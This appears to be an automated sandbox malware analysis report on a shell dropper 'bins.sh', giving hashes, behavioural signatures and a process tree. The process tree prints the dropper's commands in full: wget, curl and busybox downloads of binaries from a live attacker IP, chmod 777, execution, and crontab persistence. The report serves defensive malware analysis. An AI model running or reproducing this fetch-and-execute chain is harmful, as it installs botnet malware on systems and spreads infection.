Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
04-11-2024 04:02
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
3974491d00b9582e0258135c610a9421
-
SHA1
ecc37a0827534c2c0481e0612cd6df3fc19cf86e
-
SHA256
6bfa6f703269861e72d2adaf8105b6e76da66084c6242ca779b0a88fba559328
-
SHA512
7ede6a7178e143e32559bf9d3d51f2a6ab740c5e865bac2d7a173aef231ba0856edd270e2d8cada9440d33606071b1b89fda997c11b31fe7121618274641b57a
-
SSDEEP
192:hZC8+oCsQQl95VnaK4St9bi6I7HDvb5k8h74i6I7H/0vb5k8EC8+oCsQQHZ5VnaZ:hZhVrQQlSSnCvb5k8h790vb5k8EhVrQZ
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1899) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 6 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodpid Process 678 chmod 686 chmod 701 chmod 726 chmod 750 chmod 850 chmod -
Executes dropped EXE 5 IoCs
Processes:
Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTEEGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYdNkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfiv2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PBioc pid Process /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE 680 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd 687 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi 703 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA 727 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB 751 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB -
Renames itself 1 IoCs
Processes:
0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PBpid Process 752 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.miolvu crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 5 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PBcrontabcurldescription ioc Process File opened for reading /proc/27/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/804/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/840/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/912/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/971/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/164/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/771/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/895/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/959/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/961/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/983/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/filesystems crontab File opened for reading /proc/904/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/928/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/990/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/25/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/774/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/811/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/917/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/982/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/15/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/866/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/143/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/600/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/757/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/815/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/880/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/915/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/996/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/22/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/591/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/732/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/764/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/787/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/2/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/639/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/793/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/806/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/934/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/3/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/794/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/833/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/899/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/952/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/self/auxv curl File opened for reading /proc/776/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/828/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/13/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/23/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/106/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/136/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/579/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/838/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/955/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/770/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/813/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/933/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/966/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/967/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/19/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/797/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/810/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB File opened for reading /proc/822/cmdline 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB -
Writes file to tmp directory 7 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlwgetcurlbusyboxcurldescription ioc Process File opened for modification /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd curl File opened for modification /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi curl File opened for modification /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA curl File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB wget File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB curl File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB busybox File opened for modification /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:647
-
/bin/rm/bin/rm bins.sh2⤵PID:649
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:654
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:664
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:672
-
-
/bin/chmodchmod 777 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- File and Directory Permissions Modification
PID:678
-
-
/tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE./Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Executes dropped EXE
PID:680
-
-
/bin/rmrm Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:682
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:683
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:684
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:685
-
-
/bin/chmodchmod 777 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- File and Directory Permissions Modification
PID:686
-
-
/tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd./EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Executes dropped EXE
PID:687
-
-
/bin/rmrm EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:688
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:689
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:692
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:697
-
-
/bin/chmodchmod 777 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- File and Directory Permissions Modification
PID:701
-
-
/tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi./NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Executes dropped EXE
PID:703
-
-
/bin/rmrm NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:704
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:705
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:722
-
-
/bin/chmodchmod 777 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA./v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:728
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:729
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Writes file to tmp directory
PID:748
-
-
/bin/chmodchmod 777 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB./0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:751 -
/bin/shsh -c "crontab -l"3⤵PID:753
-
/usr/bin/crontabcrontab -l4⤵PID:754
-
-
-
/bin/shsh -c "crontab -"3⤵PID:755
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:756
-
-
-
-
/bin/rmrm 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:758
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:761
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:762
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:843
-
-
/bin/chmodchmod 777 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU./MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:851
-
-
/bin/rmrm MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:852
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:853
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
210B
MD50fdbc0c1d8909c5d1e0f6dce2d927292
SHA1a8d4bdbbe32a861c0ca20f92b31e18f5e9397474
SHA256dbc2ba6b08731e18015a3f6def8c31b289d7599f0a6898823ca7c61dd6b70183
SHA512ef4534fba9cc943cb5390622a5ecee821b3e8dea84035d3800f4c59956e329a2e94420c81d39c7d8adf661c2ce5585b6785260104cafe0cdf739facd081ad2d8